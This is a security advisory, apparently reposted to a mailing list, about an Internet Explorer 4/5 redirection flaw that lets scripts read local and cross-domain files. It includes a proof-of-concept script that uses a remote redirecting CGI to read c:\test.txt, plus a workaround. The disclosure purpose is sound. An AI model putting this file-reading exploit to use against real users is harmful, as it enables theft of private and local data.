IE HTTP redirection problem
----------------------------------------------------------------------------
----


SUMMARY

Internet Explorer 4.0 and 5.0 under Windows 95 and NT 4.0 allows reading 
local text and HTML files and files from any domain (reading files of 
other types is probably possible as well). Window spoofing is possible and 
it is also possible in some cases to read files behind a firewall. This 
vulnerability may be exploited using HTML email message or a newsgroup 
posting.

DETAILS

The problem is something like a race condition immediately.
After:
window.open("HTTP-redirecting-URL").
If you do:
a=window.open("HTTP-redirecting-url");
b=a.document;
Then you have access to the redirected URL's document using "b".

Exploit Code
<SCRIPT>
alert("Create short text file c:\\test.txt and it will be read and shown 
in a message box");
a=window.open("http://www.nat.bg/~joro/reject.cgi?test.txt");
b=a.document;
setTimeout("alert(b.body.innerText);",4000);
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?test.txt" just does a HTTP redirect 
to: "file://c:/test.txt"

Workaround:
Disable Active Scripting.

A demonstration page is available at:  
<http://www.nat.bg/~joro/msredir1.html> 
http://www.nat.bg/~joro/msredir1.html


ADDITIONAL INFORMATION

This vulnerability has been reported by:  <mailto:[EMAIL PROTECTED]> Georgi 
Guninski.



======================================== 

-------
AFLHI 058009990407128029/089802---(102598//991024)


    milis ini didukung oleh :
 >> http://www.indolinux.com - dunia linux indonesia
 -------------------------------------------------------------------
 untuk berhenti kirim  email  ke  [EMAIL PROTECTED]
 untuk melihat peraturan kirim email  ke  [EMAIL PROTECTED]
 arsip berada di  http://www.mail-archive.com/[email protected]
 

Kirim email ke